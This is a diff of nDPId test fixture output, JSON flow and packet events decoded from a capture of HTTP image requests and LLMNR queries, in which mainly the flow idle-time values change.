-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UddAAIAG5orAqHMIarsj9sHCAFAX8\/CKAAAAAIACIADC5QAAAgQE7AEDAwgBAQQC"} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdhAAIAG5onAqHMIarsj9sHDAFDIiN5cAAAAAIACIAAkfQAAAgQE7AEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdhAAIAG5onAqHMIarsj9sHDAFDIiN5cAAAAAIACIAAkfQAAAgQE7AEDAwgBAQQC"} 
-00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379119,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379119,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdRAAIAG5o3AqHMIarsj9sG\/AFBFF77fAAAAAIACIADHbwAAAgQE7AEDAwgBAQQC"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379117,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379117,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdVAAIAG5ozAqHMIarsj9sHAAFAm5\/RZAAAAAIACIACwJAAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1470104379117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379117,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdVAAIAG5ozAqHMIarsj9sHAAFAm5\/RZAAAAAIACIACwJAAAAgQE7AEDAwgBAQQC"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdZAAIAG5ovAqHMIarsj9sHBAFDavRsQAAAAAIACIADVlgAAAgQE7AEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdZAAIAG5ovAqHMIarsj9sHBAFDavRsQAAAAAIACIADVlgAAAgQE7AEDAwgBAQQC"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UddAAIAG5orAqHMIarsj9sHCAFAX8\/CKAAAAAIACIADC5QAAAgQE7AEDAwgBAQQC"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UddAAIAG5orAqHMIarsj9sHCAFAX8\/CKAAAAAIACIADC5QAAAgQE7AEDAwgBAQQC"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":80,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379118,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379118,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1470104379118,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379118,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdhAAIAG5onAqHMIarsj9sHDAFDIiN5cAAAAAIACIAAkfQAAAgQE7AEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdhAAIAG5onAqHMIarsj9sHDAFDIiN5cAAAAAIACIAAkfQAAAgQE7AEDAwgBAQQC"} 
+00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379119,"flow_last_seen":1470104379119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104379119,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1470104379119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1470104379119,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379119,"pkt":"TF4M6gNlABxCjnAxCABFAAA0UdlAAIAG5ojAqHMIarsj9sHEAFAS7Ia1AAAAAIACIAAxwAAAAgQE7AEDAwgBAQQC"} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1470104379169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":92,"pkt_l4_len":38,"thread_ts_msec":1470104379169,"pkt":"MzMAAQAD\/PiuMpcsht1gAAAAACYRAf6AAAAAAAAA6Y+64hn3aw\/\/AgAAAAAAAAAAAAAAAQAD1mgU6wAmi+DsIAAAAAEAAAAAAAAM5bCP5L2b5bCI5qmfAAD\/AAE="} 00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":84,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1470104379169,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1470104379169,"pkt":"AQBeAAD8\/PiuMpcsCABFAAA6KxkAAAER6ZbAqANf4AAA\/NZoFOsAJg3d7CAAAAABAAAAAAAADOWwj+S9m+WwiOapnwAA\/wAB"} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":85,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104379169,"flow_last_seen":1470104379169,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104379169,"l3_proto":"ip4","src_ip":"192.168.3.95","dst_ip":"224.0.0.252","src_port":54888,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1470104379169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379169,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcB6nEL4Juf0WoASchCfpwAAAgQFtAEBBAIBAwMH"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcSHsZvpEuyGtoASchC7PAAAAgQFtAEBBAIBAwMH"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcHaep2g2r0bEYASchAKkwAAAgQFtAEBBAIBAwMH"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwb\/T2SVtRRe+4IASchB7QAAAAgQFtAEBBAIBAwMH"} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcLBVjGFF\/Pwi4ASchB9IQAAAgQFtAEBBAIBAwMH"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1470104379173,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379173,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcMVSXssyIjeXYASchBBHwAAAgQFtAEBBAIBAwMH"} -00898{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":362,"flow_tot_l4_payload_len":362,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/18283-jfyj3.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379117,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/13480-alps.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379119,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/4657-jfyj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
-00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":360,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379175,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3578-ywzj.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1470104379177,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/3713-ydm.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} 
-00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104379118,"flow_last_seen":1470104379178,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":361,"flow_tot_l4_payload_len":361,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1470104379178,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"pic.1kxun.com","url":"pic.1kxun.com\/video_kankan\/images\/videos\/16649-ljdz.jpg","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Windows NT 6.1) AppleWebKit\/537.22 (KHTML, like Gecko) Chrome\/25.0.1364.152 Safari\/537.22"}} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1470104379169,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379169,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcB6nEL4Juf0WoASchCfpwAAAgQFtAEBBAIBAwMH"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1470104379170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104379170,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0AABAADYGgmJquyP2wKhzCABQwcSHsZvpEuyGtoASchC7PAAAAgQFtAEBBAIBAwMH"} 
